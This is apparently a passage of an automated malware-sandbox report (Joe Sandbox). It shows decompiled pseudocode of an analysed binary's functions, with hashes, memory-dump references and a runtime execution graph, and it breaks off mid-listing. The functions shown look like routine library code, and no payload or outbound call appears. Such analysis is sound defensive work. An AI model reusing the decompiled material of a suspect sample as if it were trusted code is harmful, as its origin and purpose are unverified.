				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E004049C0(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E00404A58( &_v8, 0x40b720);
				} else {
					E00404A58( &_v8, 0x40b714);
				}
				_t32 = E00404E80(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E00404C30(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E00404EE0( *_t49, E00404C80( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E0040B705);
				return E004049C0( &_v8);
			}













                                                                                                                                                                                          0x0040b62d
                                                                                                                                                                                          0x0040b630
                                                                                                                                                                                          0x0040b632
                                                                                                                                                                                          0x0040b636
                                                                                                                                                                                          0x0040b637
                                                                                                                                                                                          0x0040b63c
                                                                                                                                                                                          0x0040b63f
                                                                                                                                                                                          0x0040b644
                                                                                                                                                                                          0x0040b650
                                                                                                                                                                                          0x0040b65b
                                                                                                                                                                                          0x0040b666
                                                                                                                                                                                          0x0040b66d
                                                                                                                                                                                          0x0040b686
                                                                                                                                                                                          0x0040b66f
                                                                                                                                                                                          0x0040b677
                                                                                                                                                                                          0x0040b677
                                                                                                                                                                                          0x0040b69a
                                                                                                                                                                                          0x0040b6b3
                                                                                                                                                                                          0x0040b6c2
                                                                                                                                                                                          0x0040b6c8
                                                                                                                                                                                          0x0040b6e3
                                                                                                                                                                                          0x0040b6e3
                                                                                                                                                                                          0x0040b6c8
                                                                                                                                                                                          0x0040b6ea
                                                                                                                                                                                          0x0040b6ed
                                                                                                                                                                                          0x0040b6f0
                                                                                                                                                                                          0x0040b6fd

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0040B6FE), ref: 0040B6A6
                                                                                                                                                                                          • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0040B6FE), ref: 0040B6AC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DateFormatLocaleThread
                                                                                                                                                                                          • String ID: yyyy
                                                                                                                                                                                          • API String ID: 3303714858-3145165042
                                                                                                                                                                                          • Opcode ID: 8bf7041f5aa9163c90c23902cb5dc42165600dfed2dbda8273121976bdbb7efa
                                                                                                                                                                                          • Instruction ID: 9bb3f367f0bbc217274b1ad28ba4a7515005ed0bbfdc0499212bfc9343ce28fe
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8bf7041f5aa9163c90c23902cb5dc42165600dfed2dbda8273121976bdbb7efa
                                                                                                                                                                                          • Instruction Fuzzy Hash: E42132B46041089BDB01EBA5C942AAE73A8EF48300F51447BF904F73D1D7789E04C7AE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041E4D4 Relevance: 5.1, Strings: 4, Instructions: 71COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                                          			E0041E4D4(char* __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char* _t15;
				char* _t21;
				char* _t23;
				intOrPtr _t30;
				char* _t31;
				char* _t39;
				char* _t42;
				void* _t45;

				_v12 = 0;
				_t23 = __edx;
				_push(_t45);
				_push(0x41e57a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xfffffff8;
				_v8 = 0;
				if(__edx != 0) {
					_t39 = __eax;
					while( *_t23 != 0) {
						_t15 = _t23;
						while(1) {
							_t31 =  *_t23;
							__eflags = _t31;
							if(__eflags == 0) {
								break;
							}
							__eflags = _t31 + 0xd3 - 2;
							if(__eflags >= 0) {
								_t23 = _t23 + 1;
								__eflags = _t23;
								continue;
							}
							break;
						}
						E00404AB0( &_v12, _t23 - _t15, _t15, __eflags);
						_t42 = E00422044(_t39, _t23 - _t15, _v12);
						__eflags = _t42;
						if(_t42 == 0) {
							_t21 = E00408EC4(_v12, 0x41e594);
							__eflags = _t21;
							if(_t21 != 0) {
								_t42 = _t39;
							}
						}
						__eflags = _t42;
						if(_t42 != 0) {
							__eflags =  *_t23 - 0x2e;
							if( *_t23 == 0x2e) {
								_t23 = _t23 + 1;
								__eflags = _t23;
							}
							__eflags =  *_t23 - 0x2d;
							if( *_t23 == 0x2d) {
								_t23 = _t23 + 1;
								__eflags = _t23;
							}
							__eflags =  *_t23 - 0x3e;
							if( *_t23 == 0x3e) {
								_t23 = _t23 + 1;
								__eflags = _t23;
							}
							_t39 = _t42;
							continue;
						}
						goto L19;
					}
					_v8 = _t39;
				}
				L19:
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(E0041E581);
				return E004049C0( &_v12);
			}













                                                                                                                                                                                          0x0041e4df
                                                                                                                                                                                          0x0041e4e2
                                                                                                                                                                                          0x0041e4e8
                                                                                                                                                                                          0x0041e4e9
                                                                                                                                                                                          0x0041e4ee
                                                                                                                                                                                          0x0041e4f1
                                                                                                                                                                                          0x0041e4f6
                                                                                                                                                                                          0x0041e4fb
                                                                                                                                                                                          0x0041e4fd
                                                                                                                                                                                          0x0041e55c
                                                                                                                                                                                          0x0041e501
                                                                                                                                                                                          0x0041e506
                                                                                                                                                                                          0x0041e506
                                                                                                                                                                                          0x0041e508
                                                                                                                                                                                          0x0041e50a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041e50f
                                                                                                                                                                                          0x0041e512
                                                                                                                                                                                          0x0041e505
                                                                                                                                                                                          0x0041e505
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041e505
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041e512
                                                                                                                                                                                          0x0041e51c
                                                                                                                                                                                          0x0041e52b
                                                                                                                                                                                          0x0041e52d
                                                                                                                                                                                          0x0041e52f
                                                                                                                                                                                          0x0041e539
                                                                                                                                                                                          0x0041e53e
                                                                                                                                                                                          0x0041e540
                                                                                                                                                                                          0x0041e542
                                                                                                                                                                                          0x0041e542
                                                                                                                                                                                          0x0041e540
                                                                                                                                                                                          0x0041e544
                                                                                                                                                                                          0x0041e546
                                                                                                                                                                                          0x0041e548
                                                                                                                                                                                          0x0041e54b
                                                                                                                                                                                          0x0041e54d
                                                                                                                                                                                          0x0041e54d
                                                                                                                                                                                          0x0041e54d
                                                                                                                                                                                          0x0041e54e
                                                                                                                                                                                          0x0041e551
                                                                                                                                                                                          0x0041e553
                                                                                                                                                                                          0x0041e553
                                                                                                                                                                                          0x0041e553
                                                                                                                                                                                          0x0041e554
                                                                                                                                                                                          0x0041e557
                                                                                                                                                                                          0x0041e559
                                                                                                                                                                                          0x0041e559
                                                                                                                                                                                          0x0041e559
                                                                                                                                                                                          0x0041e55a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041e55a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041e546
                                                                                                                                                                                          0x0041e561
                                                                                                                                                                                          0x0041e561
                                                                                                                                                                                          0x0041e564
                                                                                                                                                                                          0x0041e566
                                                                                                                                                                                          0x0041e569
                                                                                                                                                                                          0x0041e56c
                                                                                                                                                                                          0x0041e579

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -$.$>$Owner
                                                                                                                                                                                          • API String ID: 0-4224991809
                                                                                                                                                                                          • Opcode ID: ed88b0cc8d1727be51066ff70b62824d890f0195d00cdf9e0058b3c1b2fe6d3c
                                                                                                                                                                                          • Instruction ID: 1ec6fd7220f575030784aae6d689f86c6f3a19b5914ba5df64c2a65164bf7d34
                                                                                                                                                                                          • Opcode Fuzzy Hash: ed88b0cc8d1727be51066ff70b62824d890f0195d00cdf9e0058b3c1b2fe6d3c
                                                                                                                                                                                          • Instruction Fuzzy Hash: E811E779A042507FDF228AB688907EA7FD79B4572CF1502B6DC4197382F63C8D81868D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041F880 Relevance: 5.0, Strings: 4, Instructions: 50COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                          			E0041F880(void* __eax, void* __ecx, void* __edx) {
				signed int _t7;
				void* _t8;
				void* _t17;
				void* _t29;

				_push(__ecx);
				_t29 = __edx;
				_t17 = __eax;
				_t7 = E00420870(__ecx) & 0x0000007f;
				if(_t7 > 0xd) {
					L7:
					_t8 = E0041E90C();
				} else {
					_t1 = _t7 + E0041F8A7; // 0x5
					switch( *((intOrPtr*)( *_t1 * 4 +  &M0041F8B5))) {
						case 0:
							goto L7;
						case 1:
							E0041EE34(_t17, 1, _t30);
							E00404AB0(_t29,  *_t30, 0, _t31);
							_t8 = E0041EE34(_t17,  *_t30, L00404ED8(_t29));
							goto L8;
						case 2:
							__eax = __esi;
							__edx = 0x41f94c;
							__eax = E00404A14(__esi, 0x41f94c);
							goto L8;
						case 3:
							__eax = __esi;
							__edx = 0x41f95c;
							__eax = E00404A14(__esi, 0x41f95c);
							goto L8;
						case 4:
							__eax = __esi;
							__edx = 0x41f96c;
							__eax = E00404A14(__esi, 0x41f96c);
							goto L8;
						case 5:
							__eax = __esi;
							__edx = 0x41f978;
							__eax = E00404A14(__esi, 0x41f978);
							goto L8;
					}
				}
				L8:
				return _t8;
			}







                                                                                                                                                                                          0x0041f882
                                                                                                                                                                                          0x0041f883
                                                                                                                                                                                          0x0041f885
                                                                                                                                                                                          0x0041f88e
                                                                                                                                                                                          0x0041f894
                                                                                                                                                                                          0x0041f938
                                                                                                                                                                                          0x0041f938
                                                                                                                                                                                          0x0041f89a
                                                                                                                                                                                          0x0041f89a
                                                                                                                                                                                          0x0041f8a0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041f8d6
                                                                                                                                                                                          0x0041f8e4
                                                                                                                                                                                          0x0041f8f9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041f900
                                                                                                                                                                                          0x0041f902
                                                                                                                                                                                          0x0041f907
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041f90e
                                                                                                                                                                                          0x0041f910
                                                                                                                                                                                          0x0041f915
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041f91c
                                                                                                                                                                                          0x0041f91e
                                                                                                                                                                                          0x0041f923
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041f92a
                                                                                                                                                                                          0x0041f92c
                                                                                                                                                                                          0x0041f931
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041f8a0
                                                                                                                                                                                          0x0041f93d
                                                                                                                                                                                          0x0041f940

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: False$Null$True$nil
                                                                                                                                                                                          • API String ID: 0-1063864068
                                                                                                                                                                                          • Opcode ID: f1f611ecdbca527eecfd6485f254611893f6fcae783761a482e19f57d62568f7
                                                                                                                                                                                          • Instruction ID: 085e696c31c10aaf66b077a6f8ec28a5f351394a925f53341938a7b82d3c39ae
                                                                                                                                                                                          • Opcode Fuzzy Hash: f1f611ecdbca527eecfd6485f254611893f6fcae783761a482e19f57d62568f7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E016DF972815457C204723E6A222EF05854BC8314760847FB286EB36BC93DCC8B57AF
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040D848 Relevance: 5.0, Strings: 4, Instructions: 28COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040D848() {
				intOrPtr* _t5;
				intOrPtr* _t6;
				intOrPtr* _t7;
				intOrPtr* _t8;
				intOrPtr* _t9;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t16;
				intOrPtr* _t17;
				intOrPtr* _t18;

				_t12 =  *0x49d870; // 0x407cec
				 *0x49e798 = E0040D200(_t12, 1);
				_t13 =  *0x49db6c; // 0x407d6c
				 *0x49e79c = E0040D200(_t13, 1);
				_t5 =  *0x49d748; // 0x49e008
				 *_t5 = 0x40d3c4;
				_t6 =  *0x49d964; // 0x49e004
				 *_t6 = E0040D838;
				_t7 =  *0x49d840; // 0x49e01c
				_t16 =  *0x408034; // 0x408080
				 *_t7 = _t16;
				_t8 =  *0x49d934; // 0x49e00c
				 *_t8 = E0040D588;
				_t9 =  *0x49d974; // 0x49e010
				 *_t9 =  &M0040D76C;
				_t17 =  *0x49dbbc; // 0x49e024
				 *_t17 = 0x40d4d4;
				_t18 =  *0x49d71c; // 0x49e02c
				 *_t18 = E0040D4F0;
				return E0040D4F0;
			}













                                                                                                                                                                                          0x0040d848
                                                                                                                                                                                          0x0040d85a
                                                                                                                                                                                          0x0040d85f
                                                                                                                                                                                          0x0040d871
                                                                                                                                                                                          0x0040d876
                                                                                                                                                                                          0x0040d87b
                                                                                                                                                                                          0x0040d881
                                                                                                                                                                                          0x0040d886
                                                                                                                                                                                          0x0040d88c
                                                                                                                                                                                          0x0040d891
                                                                                                                                                                                          0x0040d897
                                                                                                                                                                                          0x0040d899
                                                                                                                                                                                          0x0040d89e
                                                                                                                                                                                          0x0040d8a4
                                                                                                                                                                                          0x0040d8a9
                                                                                                                                                                                          0x0040d8b4
                                                                                                                                                                                          0x0040d8ba
                                                                                                                                                                                          0x0040d8c1
                                                                                                                                                                                          0x0040d8c7
                                                                                                                                                                                          0x0040d8c9

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: $I$,I$l}@$|@
                                                                                                                                                                                          • API String ID: 0-1445359146
                                                                                                                                                                                          • Opcode ID: 082835bc61d11fb9206d176d051807bc4680ad57b5c03684de032d34e156c939
                                                                                                                                                                                          • Instruction ID: 7f4c6fc88bc35da0646af851c93c4597c9e949375f770b248da30d937680fea0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 082835bc61d11fb9206d176d051807bc4680ad57b5c03684de032d34e156c939
                                                                                                                                                                                          • Instruction Fuzzy Hash: 06011FB4A11201CFC701EF99EE809157BF1FBA930434191BBE814AB3B6D775A845DB5C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:12.1%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:4.4%
                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                          Total number of Limit Nodes:57
                                                                                                                                                                                          execution_graph 19127 c9d449 19134 c9d274 19127->19134 19135 c9d283 __EH_prolog3_GS 19134->19135 19155 c9ccc5 19135->19155 19140 c9ca59 73 API calls 19141 c9d2cd _memset 19140->19141 19142 c9d2e8 GetLongPathNameW 19141->19142 19168 c9accc 19142->19168 19156 c9ccf7 19155->19156 19157 c9ccd5 19155->19157 19163 c9ca59 19156->19163 19158 c9ccf9 19157->19158 19159 c9ccec 19157->19159 19181 c98399 19158->19181 19176 c9aa1c 19159->19176 19162 c9cd00 InterlockedIncrement 19162->19156 19164 c9ca69 lstrlenW 19163->19164 19165 c9ca65 19163->19165 19164->19165 19369 c98323 19165->19369 19169 c9acd8 19168->19169 19170 c9acdc lstrlenW 19168->19170 19171 c9aa1c std::_String_base::_Xlen 72 API calls 19169->19171 19170->19169 19172 c9acec 19171->19172 19173 d01646 19172->19173 19387 d0071a 19173->19387 19175 d01650 19175->19175 19184 c9993b 19176->19184 19178 c9aa2a 19179 c9aa42 19178->19179 19188 c9754f 19178->19188 19179->19156 19182 c983a9 InterlockedDecrement 19181->19182 19183 c983b7 ctype 19181->19183 19182->19183 19183->19162 19185 c9994d 19184->19185 19186 c99959 std::_String_base::_Xlen 19185->19186 19187 c98399 std::_String_base::_Xlen InterlockedDecrement 19185->19187 19186->19178 19187->19186 19193 d00851 19188->19193 19190 c97564 19202 c8daa0 19190->19202 19196 d00865 _memset 19193->19196 19199 d00861 _memcpy_s 19193->19199 19194 d0086a 19210 d05d61 19194->19210 19196->19194 19198 d008b4 19196->19198 19196->19199 19198->19199 19200 d05d61 _memcpy_s 69 API calls 19198->19200 19199->19190 19201 d0086f 19200->19201 19213 d0653f 19201->19213 19203 c8daa9 19202->19203 19204 c8dacb 19202->19204 19203->19204 19206 c8dac1 19203->19206 19207 c8dad5 19203->19207 19357 c8df10 19203->19357 19205 c8df10 std::_String_base::_Xlen 2 API calls 19204->19205 19205->19207 19209 c8df10 std::_String_base::_Xlen 2 API calls 19206->19209 19207->19179 19209->19204 19216 d10c93 GetLastError 19210->19216 19212 d05d66 19212->19201 19214 d10a83 __decode_pointer 7 API calls 19213->19214 19215 d0654f __invoke_watson 19214->19215 19230 d10b1e TlsGetValue 19216->19230 19219 d10d00 SetLastError 19219->19212 19224 d10cf7 19272 d0092b 19224->19272 19225 d10cdf 19253 d10bac 19225->19253 19229 d10cfd 19229->19219 19231 d10b33 19230->19231 19232 d10b4e 19230->19232 19233 d10a83 __decode_pointer 7 API calls 19231->19233 19232->19219 19235 d0c48b 19232->19235 19234 d10b3e TlsSetValue 19233->19234 19234->19232 19238 d0c494 19235->19238 19237 d0c4d1 19237->19219 19241 d10a83 TlsGetValue 19237->19241 19238->19237 19239 d0c4b2 Sleep 19238->19239 19285 d1d95c 19238->19285 19240 d0c4c7 19239->19240 19240->19237 19240->19238 19242 d10a9b 19241->19242 19243 d10abc GetModuleHandleW 19241->19243 19242->19243 19244 d10aa5 TlsGetValue 19242->19244 19245 d10ad7 GetProcAddress 19243->19245 19246 d10acc 19243->19246 19251 d10ab0 19244->19251 19252 d10ab4 19245->19252 19317 d03327 19246->19317 19249 d10ae7 RtlDecodePointer 19250 d10aef 19249->19250 19250->19224 19250->19225 19251->19243 19251->19252 19252->19249 19252->19250 19321 d009bc 19253->19321 19255 d10bb8 GetModuleHandleW 19256 d10bc8 19255->19256 19257 d10bcf 19255->19257 19258 d03327 __decode_pointer 2 API calls 19256->19258 19259 d10be6 GetProcAddress GetProcAddress 19257->19259 19260 d10c0a 19257->19260 19261 d10bce 19258->19261 19259->19260 19262 d0efca __lock 65 API calls 19260->19262 19261->19257 19263 d10c29 InterlockedIncrement 19262->19263 19322 d10c81 19263->19322 19266 d0efca __lock 65 API calls 19267 d10c4a 19266->19267 19325 d01ac3 InterlockedIncrement 19267->19325 19269 d10c68 19337 d10c8a 19269->19337 19274 d00937 __calloc_impl 19272->19274 19273 d009b0 _realloc __calloc_impl 19273->19229 19274->19273 19276 d0efca __lock 67 API calls 19274->19276 19284 d00976 19274->19284 19275 d0098b RtlFreeHeap 19275->19273 19277 d0099d 19275->19277 19280 d0094e ___sbh_find_block 19276->19280 19278 d05d61 _memcpy_s 67 API calls 19277->19278 19279 d009a2 GetLastError 19278->19279 19279->19273 19281 d00968 19280->19281 19342 d0f129 19280->19342 19349 d00981 19281->19349 19284->19273 19284->19275 19286 d1d968 __calloc_impl 19285->19286 19287 d1d980 19286->19287 19297 d1d99f _memset 19286->19297 19288 d05d61 _memcpy_s 68 API calls 19287->19288 19289 d1d985 19288->19289 19290 d0653f _memcpy_s 7 API calls 19289->19290 19292 d1d995 __calloc_impl 19290->19292 19291 d1da11 RtlAllocateHeap 19291->19297 19292->19238 19297->19291 19297->19292 19298 d0efca 19297->19298 19305 d0fd38 19297->19305 19311 d1da58 19297->19311 19314 d11307 19297->19314 19299 d0eff2 EnterCriticalSection 19298->19299 19300 d0efdf 19298->19300 19299->19297 19301 d0ef07 __mtinitlocknum 68 API calls 19300->19301 19302 d0efe5 19301->19302 19302->19299 19303 d03357 __amsg_exit 68 API calls 19302->19303 19304 d0eff1 19303->19304 19304->19299 19308 d0fd66 19305->19308 19306 d0fdff 19307 d0f4ef ___sbh_alloc_new_group VirtualAlloc 19306->19307 19309 d0fe08 19306->19309 19307->19309 19308->19306 19308->19309 19310 d0f43f ___sbh_alloc_new_region HeapReAlloc HeapAlloc VirtualAlloc HeapFree 19308->19310 19309->19297 19310->19306 19312 d0eed8 _doexit LeaveCriticalSection 19311->19312 19313 d1da5f 19312->19313 19313->19297 19315 d10a83 __decode_pointer 7 API calls 19314->19315 19316 d11317 19315->19316 19316->19297 19318 d03332 Sleep GetModuleHandleW 19317->19318 19319 d03350 19318->19319 19320 d03354 19318->19320 19319->19318 19319->19320 19320->19245 19320->19250 19321->19255 19340 d0eed8 LeaveCriticalSection 19322->19340 19324 d10c43 19324->19266 19326 d01ae1 InterlockedIncrement 19325->19326 19327 d01ae4 19325->19327 19326->19327 19328 d01af1 19327->19328 19329 d01aee InterlockedIncrement 19327->19329 19330 d01afb InterlockedIncrement 19328->19330 19331 d01afe 19328->19331 19329->19328 19330->19331 19332 d01b08 InterlockedIncrement 19331->19332 19334 d01b0b 19331->19334 19332->19334 19333 d01b24 InterlockedIncrement 19333->19334 19334->19333 19335 d01b34 InterlockedIncrement 19334->19335 19336 d01b3f InterlockedIncrement 19334->19336 19335->19334 19336->19269 19340->19324 19343 d0f168 19342->19343 19348 d0f40a 19342->19348 19344 d0f354 VirtualFree 19343->19344 19343->19348 19345 d0f3b8 19344->19345 19346 d0f3c7 VirtualFree HeapFree 19345->19346 19345->19348 19352 d03dc0 19346->19352 19348->19281 19356 d0eed8 LeaveCriticalSection 19349->19356 19351 d00988 19351->19284 19353 d03dd8 19352->19353 19354 d03dff __VEC_memcpy 19353->19354 19355 d03e07 19353->19355 19354->19355 19355->19348 19356->19351 19364 d00729 19357->19364 19359 c8df27 19367 c8de80 InitializeCriticalSection 19359->19367 19362 c8df55 19362->19206 19363 c8df10 std::_String_base::_Xlen 2 API calls 19363->19362 19365 d00752 19364->19365 19366 d0075e RaiseException 19364->19366 19365->19366 19366->19359 19368 c8dee1 19367->19368 19368->19362 19368->19363 19370 c98331 19369->19370 19376 c98361 19369->19376 19371 c98376 19370->19371 19372 c9834c 19370->19372 19378 c982ad 19371->19378 19374 c9754f std::_String_base::_Xlen 71 API calls 19372->19374 19374->19376 19376->19140 19379 c98310 19378->19379 19380 c982ca std::_String_base::_Xlen 19378->19380 19379->19376 19384 c977da 19379->19384 19380->19379 19381 c9754f std::_String_base::_Xlen 71 API calls 19380->19381 19382 c982f5 19381->19382 19383 c9754f std::_String_base::_Xlen 71 API calls 19382->19383 19383->19379 19385 c977f2 ctype 19384->19385 19386 c977e7 InterlockedDecrement 19384->19386 19385->19376 19386->19385 19388 d00722 19387->19388 19389 d00724 IsDebuggerPresent 19387->19389 19388->19175 19395 d1da7a 19389->19395 19392 d0e952 SetUnhandledExceptionFilter UnhandledExceptionFilter 19393 d0e977 GetCurrentProcess TerminateProcess 19392->19393 19394 d0e96f __invoke_watson 19392->19394 19393->19175 19394->19393 19395->19392 20068 cf148e 20071 d0a6b1 20068->20071 20072 d0a6e1 20071->20072 20073 d0a6c5 20071->20073 20075 d10b1e ___set_flsgetvalue 9 API calls 20072->20075 20074 d05d61 _memcpy_s 69 API calls 20073->20074 20076 d0a6ca 20074->20076 20077 d0a6e7 20075->20077 20078 d0653f _memcpy_s 7 API calls 20076->20078 20079 d0c48b __calloc_crt 69 API calls 20077->20079 20090 cf14ae 20078->20090 20080 d0a6f3 20079->20080 20081 d0a745 20080->20081 20092 d10d0c 20080->20092 20082 d0092b ___free_lconv_mon 69 API calls 20081->20082 20084 d0a74b 20082->20084 20084->20090 20097 d05d87 20084->20097 20086 d10bac __initptd 69 API calls 20087 d0a709 CreateThread 20086->20087 20087->20090 20091 d0a73c GetLastError 20087->20091 20112 d0a62e 20087->20112 20091->20081 20093 d10c93 __getptd_noexit 69 API calls 20092->20093 20094 d10d14 20093->20094 20095 d0a700 20094->20095 20102 d03357 20094->20102 20095->20086 20109 d05d74 20097->20109 20099 d05d92 _realloc 20100 d05d61 _memcpy_s 69 API calls 20099->20100 20101 d05da5 20100->20101 20101->20090 20103 d11500 __FF_MSGBANNER 69 API calls 20102->20103 20104 d03361 20103->20104 20105 d1132f __NMSG_WRITE 69 API calls 20104->20105 20106 d03369 20105->20106 20107 d10a83 __decode_pointer 7 API calls 20106->20107 20108 d03374 20107->20108 20108->20095 20110 d10c93 __getptd_noexit 69 API calls 20109->20110 20111 d05d79 20110->20111 20111->20099 20113 d10b1e ___set_flsgetvalue 9 API calls 20112->20113 20114 d0a639 __threadstartex@4 20113->20114 20127 d10afe TlsGetValue 20114->20127 20117 d0a672 20140 d10d26 20117->20140 20118 d0a648 __threadstartex@4 20137 d10b52 20118->20137 20120 d0a68d __IsNonwritableInCurrentImage 20129 d0a5ed 20120->20129 20125 d0a668 GetCurrentThreadId 20125->20120 20126 d0a65b GetLastError ExitThread 20128 d0a644 20127->20128 20128->20117 20128->20118 20130 d0a5f9 __calloc_impl 20129->20130 20131 d10d0c __getptd 69 API calls 20130->20131 20132 d0a5fe 20131->20132 20176 d0a5b0 20132->20176 20138 d10a83 __decode_pointer 7 API calls 20137->20138 20139 d0a657 20138->20139 20139->20125 20139->20126 20141 d10d32 __calloc_impl 20140->20141 20142 